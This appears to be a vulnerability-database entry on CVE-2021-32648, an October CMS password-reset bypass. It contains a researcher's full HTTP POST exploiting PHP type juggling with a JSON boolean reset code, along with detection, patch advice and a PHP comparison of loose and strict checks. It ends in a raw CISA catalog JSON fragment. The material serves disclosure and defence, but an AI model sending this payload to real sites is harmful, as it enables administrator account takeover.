octobercms is a CMS platform based on the Laravel PHP Framework. In affected versions of the october/system package an attacker can request an account password reset and then gain access to the account using a specially crafted request. The issue has been patched in Build 472 and v1.1.5.
**Recent assessments:**
**kevthehermit** at January 14, 2022 5:01pm UTC reported:
### Overview
This is a simple Type Confusion / Juggling vulnerability.
October CMS will check to see if the user-supplied reset code matches the value in the database: `return ($this->reset_password_code == $resetCode);`
If we can send a boolean value in place of a reset code, we can bypass this check.
Laravel has a feature whereby, if an HTTP POST request is sent as JSON, it will be converted to a matching form data set; however, the types will persist.
To exploit this vulnerability we simply need to set the `Content-Type` to JSON and structure our POST request accordingly. An example POST is shown below.
```http
POST /backend/backend/auth/reset/1/[] HTTP/1.1
Host: 172.17.0.2
Content-Length: 162
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://172.17.0.2
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.17.0.2/backend/backend/auth/reset/1/a
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: october_session=eyJpdiI6ImlGZHMrRTVEUGh6dHkxWllEeVF5dEE9PSIsInZhbHVlIjoiV2tkcmsrbkJxa2R6OWg1TVFLbTQ2Y1pTSG9ZT1RYTEFwdlY0YVVRVEU5a0pxbG5LdE81WVpXeDdGa3pHclhTWGhkbEE2WGZPME82aEpVWFBqcktEakR6Qng3WVpsWUdzYm9mOG9cL0YxTjNXbXFyUEZxWGNVM1BrcmJLaFVIZXVaIiwibWFjIjoiZmVkMDljNGE2MDc2ZGI5NjgyOThkMDJjZGFhNDcxYzg3MTNlNmJhZTRiYmIzZmVkYjNmYTUyMzA4ZjQxMjdiNiJ9
Connection: close

{"_session_key":"RQjdfLkFotyuA4BHOjVykboK3DHByTyDFEs7xZXC","_token":"jBD7MXYuIrYC4n0GClVCigIBrSOShoUICwy3gShS","postback":1,"id":1,"code":true,"password":"hello"}
```
### In the Wild
This has not been verified but initial reports suggest this vulnerability was used to deface a set of Ukrainian government websites – <https://twitter.com/KimZetter/status/1481890639029551106>
### PoC
A proof of concept python script that will attempt to reset the password for the admin account has been published – <https://github.com/Immersive-Labs-Sec/CVE-2021-32648>
### Detection
An attacker attempting to exploit this attack will need to trigger a password reset email. If you observe password reset emails then check access to the server and respond accordingly.
### Mitigation
Applying the patches will successfully mitigate against this attack.
Assessed Attacker Value: 2
Assessed Exploitability: 5
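As an added illustration (not code from October CMS, from its patch, or from the assessment above), the loosely typed check quoted in the overview is placed beside a strictly typed replacement and fed with request bodies decoded the way a JSON body reaches the application. The stored code, the function names and the sample bodies are constructed for this example.

```php
<?php
// Added example, not October CMS code: why `$stored == $supplied` can be
// satisfied by a JSON body carrying `true`, and a check that cannot be.
declare(strict_types=1);

// The comparison quoted in the assessment, isolated as a function.
// PHP's loose `==` converts the operands to a common type first, so a
// non-empty string compared with bool(true) is treated as true == true.
function checkResetCodeLoose(string $stored, $supplied): bool
{
    return $stored == $supplied;
}

// Hardened variant (illustration, not the project's actual fix):
// refuse anything that is not a non-empty string before comparing, then
// compare with hash_equals() so timing does not leak matching prefixes.
function checkResetCodeStrict(string $stored, $supplied): bool
{
    if (!is_string($supplied) || $supplied === '') {
        return false;
    }
    return hash_equals($stored, $supplied);
}

// Constructed value standing in for reset_password_code in the database.
$storedCode = 'Qm9yZWRPZkJyb2tlbkNvbXBhcmlzb25z';

// Constructed request bodies. json_decode() keeps JSON types, so a JSON
// `true` arrives as PHP bool(true) rather than the form-encoded string "1".
$bodies = [
    'correct code'  => '{"code":"Qm9yZWRPZkJyb2tlbkNvbXBhcmlzb25z"}',
    'wrong code'    => '{"code":"not-the-code"}',
    'boolean true'  => '{"code":true}',      // matches any non-empty stored code under ==
    'integer zero'  => '{"code":0}',         // matches under == on PHP 7, not on PHP 8
    'empty array'   => '{"code":[]}',        // never equal to a string under ==
    'missing code'  => '{"postback":1}',     // null: never equal to a non-empty string
];

foreach ($bodies as $label => $json) {
    $decoded  = json_decode($json, true);
    $supplied = $decoded['code'] ?? null;

    printf(
        "%-13s  type=%-7s  loose=%-5s  strict=%s\n",
        $label,
        gettype($supplied),
        checkResetCodeLoose($storedCode, $supplied) ? 'true' : 'false',
        checkResetCodeStrict($storedCode, $supplied) ? 'true' : 'false'
    );
}
```

Only the correct code passes the strict check, while the loose check also accepts the boolean body (and, on PHP 7, the integer body); the same type guard is what the reset handler must apply to every value it reads from a JSON request.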
These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise.\n\n**CVE Number** | **CVE Title** | **Required Action Due Date** \n---|---|--- \nCVE-2021-32648 | October CMS Improper Authentication | 2/1/2022 \nCVE-2021-21315 | System Information Library for node.js Command Injection Vulnerability | 2/1/2022 \nCVE-2021-21975 | Server Side Request Forgery in vRealize Operations Manager API Vulnerability | 2/1/2022 \nCVE-2021-22991 | BIG-IP Traffic Microkernel Buffer Overflow Vulnerability | 2/1/2022 \nCVE-2021-25296 | Nagios XI OS Command Injection Vulnerability | 2/1/2022 \nCVE-2021-25297 | Nagios XI OS Command Injection Vulnerability | 2/1/2022 \nCVE-2021-25298 | Nagios XI OS Command Injection Vulnerability | 2/1/2022 \nCVE-2021-33766 | Microsoft Exchange Server Information Disclosure Vulnerability | 2/1/2022 \nCVE-2021-40870 | Aviatrix Controller Unrestricted Upload of File Vulnerability | 2/1/2022 \nCVE-2020-11978 | Apache Airflow Command Injection Vulnerability | 7/18/2022 \nCVE-2020-13671 | Drupal Core Unrestricted Upload of File Vulnerability | 7/18/2022 \nCVE-2020-13927 | Apache Airflow Experimental API Authentication Bypass Vulnerability | 7/18/2022 \nCVE-2020-14864 | Oracle Corporate Business Intelligence Enterprise Edition Path Traversal Vulnerability | 7/18/2022 \n \n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. 
See the [BOD 22-01 Fact Sheet](<https://www.cisa.gov/known-exploited-vulnerabilities>) for more information.\n\nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog >) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities >).\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/01/18/cisa-adds-13-known-exploited-vulnerabilities-catalog>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-18T00:00:00", "type": "cisa", "title": "CISA Adds 13 Known Exploited Vulnerabilities to Catalog", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, 
"acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11978", "CVE-2020-13671", "CVE-2020-13927", "CVE-2020-14864", "CVE-2021-21315", "CVE-2021-21975", "CVE-2021-22991", "CVE-2021-25296", "CVE-2021-25297", "CVE-2021-25298", "CVE-2021-32648", "CVE-2021-33766", "CVE-2021-40870"], "modified": "2022-01-25T00:00:00", "id": "CISA:D7385BDD2786721598A2135E182282C2", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/01/18/cisa-adds-13-known-exploited-vulnerabilities-catalog", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}]}